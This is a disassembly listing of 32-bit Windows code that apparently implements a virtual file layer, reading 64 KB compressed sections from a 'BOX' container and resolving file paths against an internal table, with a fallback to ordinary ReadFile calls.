; ---------------------------------------------------------------------------
loc_414F04: ; CODE XREF: sub_414C5A+2CF�j
mov eax, [ebp+var_64]
inc eax
mov [ebp+var_64], eax
loc_414F0B: ; CODE XREF: sub_414C5A+2A8�j
mov eax, [ebp+var_64]
cmp eax, [ebp+arg_4]
jnb short loc_414F2B
mov eax, [ebp+var_64]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
mov ecx, [ebp+var_20]
add ecx, eax
mov [ebp+var_20], ecx
jmp short loc_414F04
; ---------------------------------------------------------------------------
loc_414F2B: ; CODE XREF: sub_414C5A+273�j
; sub_414C5A+2B7�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
push eax
mov eax, [ebp+var_34]
mov eax, [eax+4]
add eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call loc_414A0E
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz short loc_414F60
xor eax, eax
jmp loc_414FF8
; ---------------------------------------------------------------------------
loc_414F60: ; CODE XREF: sub_414C5A+2FD�j
mov [ebp+var_2C], 10000h
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 80000000h
test eax, eax
jnz short loc_414FAC
push [ebp+var_1C]
push [ebp+var_38]
lea eax, [ebp+var_2C]
push eax
push [ebp+var_3C]
call sub_420CCE
add esp, 10h
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_414FAA
push [ebp+var_68]
push offset aBoxReadcompres ; ":BOX:ReadCompressedSection: decompresio"...
call sub_41BE16
pop ecx
pop ecx
xor eax, eax
jmp short loc_414FF8
; ---------------------------------------------------------------------------
loc_414FAA: ; CODE XREF: sub_414C5A+33B�j
jmp short loc_414FC3
; ---------------------------------------------------------------------------
loc_414FAC: ; CODE XREF: sub_414C5A+31D�j
mov ecx, [ebp+var_1C]
mov esi, [ebp+var_38]
mov edi, [ebp+var_3C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_414FC3: ; CODE XREF: sub_414C5A:loc_414FAA�j
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_4]
mov ds:dword_423B70[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov ds:dword_423B74[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_423B68
push eax
call ds:dword_4246AC ; GetSystemTimeAsFileTime
mov eax, [ebp+var_3C]
loc_414FF8: ; CODE XREF: sub_414C5A+8C�j
; sub_414C5A+1BA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_414C5A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415009 proc near ; CODE XREF: sub_415175+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
shr eax, 10h
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
shr eax, 10h
mov [ebp+var_4], eax
push [ebp+var_10]
push [ebp+arg_0]
call sub_414C5A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41504E
xor eax, eax
jmp loc_41516F
; ---------------------------------------------------------------------------
loc_41504E: ; CODE XREF: sub_415009+3C�j
mov eax, [ebp+var_14]
xor edx, edx
mov ecx, 10000h
div ecx
mov [ebp+var_8], edx
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_415072
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
jmp short loc_41507D
; ---------------------------------------------------------------------------
loc_415072: ; CODE XREF: sub_415009+5F�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
loc_41507D: ; CODE XREF: sub_415009+67�j
mov ecx, [ebp+var_18]
mov esi, [ebp+var_C]
add esi, [ebp+var_8]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4150AC
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
jmp short loc_4150B7
; ---------------------------------------------------------------------------
loc_4150AC: ; CODE XREF: sub_415009+99�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
loc_4150B7: ; CODE XREF: sub_415009+A1�j
mov eax, [ebp+var_1C]
mov [ebp+var_8], eax
loc_4150BD: ; CODE XREF: sub_415009+15E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jbe loc_41516C
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
ja short loc_4150EE
push ds:off_4214F0
push 0BBh
push ds:off_4214F4
call sub_41BB7C
loc_4150EE: ; CODE XREF: sub_415009+CD�j
push [ebp+var_10]
push [ebp+arg_0]
call sub_414C5A
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_415106
xor eax, eax
jmp short loc_41516F
; ---------------------------------------------------------------------------
loc_415106: ; CODE XREF: sub_415009+F7�j
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_41511E
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_20], eax
jmp short loc_415125
; ---------------------------------------------------------------------------
loc_41511E: ; CODE XREF: sub_415009+108�j
mov [ebp+var_20], 10000h
loc_415125: ; CODE XREF: sub_415009+113�j
mov ecx, [ebp+var_20]
mov esi, [ebp+var_C]
mov edi, [ebp+arg_4]
add edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_415157
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_24], eax
jmp short loc_41515E
; ---------------------------------------------------------------------------
loc_415157: ; CODE XREF: sub_415009+141�j
mov [ebp+var_24], 10000h
loc_41515E: ; CODE XREF: sub_415009+14C�j
mov eax, [ebp+var_8]
add eax, [ebp+var_24]
mov [ebp+var_8], eax
jmp loc_4150BD
; ---------------------------------------------------------------------------
loc_41516C: ; CODE XREF: sub_415009+BA�j
push 1
pop eax
loc_41516F: ; CODE XREF: sub_415009+40�j
; sub_415009+FB�j
pop edi
pop esi
leave
retn 0Ch
sub_415009 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415175 proc near ; CODE XREF: sub_41396C+242�p
; sub_413FDF+172�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041545B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213C0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 3Ch
push ebx
push esi
push edi
cmp [ebp+arg_14], 0
jnz short loc_4151A6
lea eax, [ebp+var_1C]
mov [ebp+arg_14], eax
loc_4151A6: ; CODE XREF: sub_415175+29�j
mov eax, ds:dword_424864
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz short loc_4151C7
mov eax, [ebp+var_3C]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_40], 1
jmp short loc_4151CB
; ---------------------------------------------------------------------------
loc_4151C7: ; CODE XREF: sub_415175+3D�j
and [ebp+var_40], 0
loc_4151CB: ; CODE XREF: sub_415175+50�j
movzx eax, [ebp+var_40]
test eax, eax
jz loc_41545B
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_415434
cmp [ebp+arg_10], 0
jz short loc_415205
mov eax, [ebp+arg_10]
mov dword ptr [eax], 3E5h
loc_415205: ; CODE XREF: sub_415175+85�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_415252
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246FC ; ReadFile
mov ecx, [ebp+arg_14]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp loc_41545D
; ---------------------------------------------------------------------------
loc_415252: ; CODE XREF: sub_415175+A5�j
cmp [ebp+arg_10], 0
jz short loc_41527F
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_41527F
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_20]
mov ecx, [ecx+4]
mov [eax+0Ch], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+8]
mov [eax+4], ecx
loc_41527F: ; CODE XREF: sub_415175+E1�j
; sub_415175+F0�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov eax, [eax+4]
add eax, [ebp+arg_8]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4152A5
mov eax, [ebp+var_30]
mov ecx, [ebp+var_20]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp+var_28], eax
loc_4152A5: ; CODE XREF: sub_415175+11F�j
cmp [ebp+arg_C], 0
jnz short loc_4152B1
lea eax, [ebp+var_2C]
mov [ebp+arg_C], eax
loc_4152B1: ; CODE XREF: sub_415175+134�j
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
cmp [ebp+arg_8], 0
jbe loc_4153B6
cmp [ebp+var_28], 0
jbe loc_4153B6
mov eax, [ebp+var_30]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jz short loc_4152FC
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+var_20]
call sub_415009
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4152F7
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_28]
mov [eax], ecx
loc_4152F7: ; CODE XREF: sub_415175+178�j
jmp loc_4153B4
; ---------------------------------------------------------------------------
loc_4152FC: ; CODE XREF: sub_415175+161�j
and [ebp+var_34], 0
loc_415300: ; CODE XREF: sub_415175+23A�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4153B4
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_415324
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_4C], eax
jmp short loc_41532B
; ---------------------------------------------------------------------------
loc_415324: ; CODE XREF: sub_415175+1A2�j
mov [ebp+var_4C], 10000h
loc_41532B: ; CODE XREF: sub_415175+1AD�j
push [ebp+arg_C]
push [ebp+var_4C]
mov eax, [ebp+var_30]
mov eax, [eax+4]
mov ecx, [ebp+var_20]
add eax, [ecx+4]
add eax, [ebp+var_34]
push eax
push [ebp+var_20]
call loc_414A0E
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz short loc_41537B
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_41536A
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_50], eax
jmp short loc_415371
; ---------------------------------------------------------------------------
loc_41536A: ; CODE XREF: sub_415175+1E8�j
mov [ebp+var_50], 10000h
loc_415371: ; CODE XREF: sub_415175+1F3�j
mov eax, [ebp+arg_C]
mov eax, [eax]
cmp eax, [ebp+var_50]
jz short loc_415381
loc_41537B: ; CODE XREF: sub_415175+1DB�j
and [ebp+var_24], 0
jmp short loc_4153B4
; ---------------------------------------------------------------------------
loc_415381: ; CODE XREF: sub_415175+204�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov esi, [ebp+var_38]
mov edi, [ebp+arg_4]
add edi, [ebp+var_34]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
add ecx, [eax]
mov [ebp+var_34], ecx
jmp loc_415300
; ---------------------------------------------------------------------------
loc_4153B4: ; CODE XREF: sub_415175:loc_4152F7�j
; sub_415175+191�j ...
jmp short loc_4153C3
; ---------------------------------------------------------------------------
loc_4153B6: ; CODE XREF: sub_415175+146�j
; sub_415175+150�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
loc_4153C3: ; CODE XREF: sub_415175:loc_4153B4�j
cmp [ebp+var_24], 0
jz short loc_4153DA
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov ecx, [ebp+arg_C]
add eax, [ecx]
mov ecx, [ebp+var_20]
mov [ecx+4], eax
loc_4153DA: ; CODE XREF: sub_415175+252�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_24]
mov [eax], ecx
cmp [ebp+arg_10], 0
jz short loc_41541B
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_41541B
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+0Ch]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax], 0
loc_41541B: ; CODE XREF: sub_415175+271�j
; sub_415175+280�j
push 0FFFFFFFFh
mov [ebp+var_54], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp short loc_41545D
; ---------------------------------------------------------------------------
loc_415434: ; CODE XREF: sub_415175+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41543F
jmp short loc_41545B
sub_415175 endp
; =============== S U B R O U T I N E =======================================
sub_41543F proc near ; CODE XREF: sub_415175+2C3�p
; DATA XREF: _4:004213C8�o
mov eax, ds:dword_424864
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0
jz short locret_41545A
mov eax, [ebp-44h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_41545A: ; CODE XREF: sub_41543F+C�j
retn
sub_41543F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_415175
loc_41545B: ; CODE XREF: sub_415175+5C�j
; sub_415175+2C8�j
xor eax, eax
loc_41545D: ; CODE XREF: sub_415175+D8�j
; sub_415175+2BD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_415175
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41546E proc near ; CODE XREF: sub_413272+91�p
; sub_41553D+95�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov [ebp+var_8], 2
jmp short loc_41548E
; ---------------------------------------------------------------------------
loc_415487: ; CODE XREF: sub_41546E+5E�j
; sub_41546E+7F�j ...
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41548E: ; CODE XREF: sub_41546E+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jnb loc_415521
mov eax, ds:dword_424888
add eax, [ebp+var_8]
mov al, [eax+114h]
mov [ebp+var_C], al
movsx eax, [ebp+var_C]
mov ecx, ds:dword_424888
add ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx+114h]
cmp eax, ecx
jnz short loc_4154CE
movsx eax, [ebp+var_C]
cmp eax, 5Ch
jnz short loc_4154CE
jmp short loc_415487
; ---------------------------------------------------------------------------
loc_4154CE: ; CODE XREF: sub_41546E+53�j
; sub_41546E+5C�j
movsx eax, [ebp+var_C]
cmp eax, 2Fh
jnz short loc_4154EF
mov eax, ds:dword_424888
add eax, [ebp+var_8]
mov byte ptr [eax+114h], 5Ch
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
jmp short loc_415487
; ---------------------------------------------------------------------------
loc_4154EF: ; CODE XREF: sub_41546E+67�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
jz short loc_415515
mov eax, ds:dword_424888
add eax, [ebp+var_4]
mov ecx, ds:dword_424888
add ecx, [ebp+var_8]
mov cl, [ecx+114h]
mov [eax+115h], cl
loc_415515: ; CODE XREF: sub_41546E+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp loc_415487
; ---------------------------------------------------------------------------
loc_415521: ; CODE XREF: sub_41546E+26�j
mov eax, ds:dword_424888
add eax, [ebp+var_4]
and byte ptr [eax+115h], 0
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
leave
retn
sub_41546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41553D proc near ; CODE XREF: sub_413D44+3A�p
; sub_414344+19�p ...
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 00415854 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213D0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 4Ch
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_41556E
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_41556E: ; CODE XREF: sub_41553D+29�j
cmp ds:dword_424888, 0
jnz short loc_41557E
xor eax, eax
jmp loc_415856
; ---------------------------------------------------------------------------
loc_41557E: ; CODE XREF: sub_41553D+38�j
and [ebp+var_1C], 0
push offset dword_424848
call ds:dword_424644 ; RtlEnterCriticalSection
and [ebp+var_4], 0
lea eax, [ebp+var_1C]
push eax
mov eax, ds:dword_424888
add eax, 114h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_424688 ; GetFullPathNameA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_41583D
push [ebp+var_20]
mov eax, ds:dword_424888
add eax, 114h
push eax
call ds:dword_424748 ; CharUpperBuffA
mov ecx, [ebp+var_20]
call sub_41546E
mov ecx, [ebp+var_1C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, ds:dword_424888
mov ecx, [eax+21Ch]
mov edi, ds:dword_424888
add edi, 10h
mov esi, ds:dword_424888
add esi, 114h
xor eax, eax
repe cmpsb
jnz loc_4157B2
mov eax, ds:dword_424888
mov eax, [eax+21Ch]
mov ecx, ds:dword_424888
lea eax, [ecx+eax+114h]
mov [ebp+var_24], eax
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_30], ecx
mov [ebp+var_34], 1
mov eax, ds:dword_424888
mov eax, [eax+0Ch]
mov [ebp+var_28], eax
and [ebp+var_2C], 0
loc_41564A: ; CODE XREF: sub_41553D:loc_4156EA�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
ja loc_4156EF
mov eax, [ebp+var_34]
add eax, [ebp+var_28]
shr eax, 1
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
dec eax
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov [ebp+var_38], eax
push [ebp+var_30]
mov eax, [ebp+var_38]
push dword ptr [eax]
push [ebp+var_24]
call sub_4105F0
add esp, 0Ch
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jnz short loc_4156D4
mov eax, [ebp+var_38]
mov eax, [eax]
mov ecx, [ebp+var_30]
movsx eax, byte ptr [eax+ecx]
test eax, eax
jz short loc_4156B4
mov eax, [ebp+var_38]
mov eax, [eax]
mov ecx, [ebp+var_30]
movsx eax, byte ptr [eax+ecx]
cmp eax, 5Ch
jnz short loc_4156CB
loc_4156B4: ; CODE XREF: sub_41553D+164�j
mov eax, [ebp+var_40]
dec eax
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_2C], ecx
jmp short loc_4156EF
; ---------------------------------------------------------------------------
loc_4156CB: ; CODE XREF: sub_41553D+175�j
mov eax, [ebp+var_40]
dec eax
mov [ebp+var_28], eax
jmp short loc_4156EA
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_41553D+154�j
cmp [ebp+var_3C], 0
jle short loc_4156E3
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_34], eax
jmp short loc_4156EA
; ---------------------------------------------------------------------------
loc_4156E3: ; CODE XREF: sub_41553D+19B�j
mov eax, [ebp+var_40]
dec eax
mov [ebp+var_28], eax
loc_4156EA: ; CODE XREF: sub_41553D+195�j
; sub_41553D+1A4�j
jmp loc_41564A
; ---------------------------------------------------------------------------
loc_4156EF: ; CODE XREF: sub_41553D+113�j
; sub_41553D+18C�j
cmp [ebp+var_2C], 0
jz loc_4157AD
cmp [ebp+arg_4], 0
jz short loc_415707
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_415707: ; CODE XREF: sub_41553D+1C0�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_24]
mov [ebp+var_50], eax
loc_415717: ; CODE XREF: sub_41553D+20C�j
mov eax, [ebp+var_50]
mov al, [eax]
mov [ebp+var_51], al
mov ecx, [ebp+var_4C]
cmp al, [ecx]
jnz short loc_415751
cmp [ebp+var_51], 0
jz short loc_41574B
mov eax, [ebp+var_50]
mov al, [eax+1]
mov [ebp+var_52], al
mov ecx, [ebp+var_4C]
cmp al, [ecx+1]
jnz short loc_415751
add [ebp+var_50], 2
add [ebp+var_4C], 2
cmp [ebp+var_52], 0
jnz short loc_415717
loc_41574B: ; CODE XREF: sub_41553D+1ED�j
and [ebp+var_58], 0
jmp short loc_415759
; ---------------------------------------------------------------------------
loc_415751: ; CODE XREF: sub_41553D+1E7�j
; sub_41553D+1FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_58], eax
loc_415759: ; CODE XREF: sub_41553D+212�j
mov eax, [ebp+var_58]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jnz short loc_41576D
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
jmp short loc_415773
; ---------------------------------------------------------------------------
loc_41576D: ; CODE XREF: sub_41553D+226�j
mov eax, [ebp+arg_8]
mov byte ptr [eax], 1
loc_415773: ; CODE XREF: sub_41553D+22E�j
cmp [ebp+arg_C], 0
jz short loc_415792
push 0
mov eax, ds:dword_424888
add eax, 114h
push eax
call sub_41C9BA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_415792: ; CODE XREF: sub_41553D+23A�j
push 0FFFFFFFFh
mov eax, [ebp+var_2C]
mov [ebp+var_60], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_60]
jmp loc_415856
; ---------------------------------------------------------------------------
loc_4157AD: ; CODE XREF: sub_41553D+1B6�j
jmp loc_41583D
; ---------------------------------------------------------------------------
loc_4157B2: ; CODE XREF: sub_41553D+C6�j
push [ebp+var_1C]
call sub_41C106
pop ecx
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_41583D
mov eax, ds:dword_424888
mov eax, [eax+8]
cmp eax, [ebp+var_44]
ja short loc_41583D
mov eax, ds:dword_424888
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_424888
mov ecx, [ecx+8]
add ecx, eax
cmp [ebp+var_44], ecx
jnb short loc_41583D
mov eax, [ebp+var_44]
mov [ebp+var_48], eax
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
cmp [ebp+arg_C], 0
jz short loc_415817
push 0
mov eax, ds:dword_424888
add eax, 114h
push eax
call sub_41C9BA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_415817: ; CODE XREF: sub_41553D+2BF�j
cmp [ebp+arg_4], 0
jz short loc_415825
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_48]
mov [eax], ecx
loc_415825: ; CODE XREF: sub_41553D+2DE�j
push 0FFFFFFFFh
mov eax, [ebp+var_44]
mov [ebp+var_64], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp short loc_415856
; ---------------------------------------------------------------------------
loc_41583D: ; CODE XREF: sub_41553D+78�j
; sub_41553D:loc_4157AD�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_415848
jmp short loc_415854
sub_41553D endp
; =============== S U B R O U T I N E =======================================
sub_415848 proc near ; CODE XREF: sub_41553D+304�p
; DATA XREF: _4:004213D8�o
push offset dword_424848
call ds:dword_4246D4 ; RtlLeaveCriticalSection
retn
sub_415848 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41553D
loc_415854: ; CODE XREF: sub_41553D+309�j
xor eax, eax
loc_415856: ; CODE XREF: sub_41553D+3C�j
; sub_41553D+26B�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_41553D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415867 proc near ; CODE XREF: sub_4191AB+3D�p
; sub_41D7FD+29�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00415934 SIZE 00000043 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4213E0
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_30]
call sub_41553D
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz loc_415934
cmp [ebp+arg_0], 0
jz short loc_415934
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_30]
call sub_41C9BA
pop ecx
pop ecx
mov edx, eax
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
mov edx, edi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_24], edx
and [ebp+var_4], 0
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_24]
call sub_41553D
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_415924
jmp short loc_415934
sub_415867 endp
; =============== S U B R O U T I N E =======================================
sub_415924 proc near ; CODE XREF: sub_415867+B6�p
; DATA XREF: _4:004213E8�o
mov eax, [ebp-24h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_41BACD
pop ecx
retn
sub_415924 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_415867
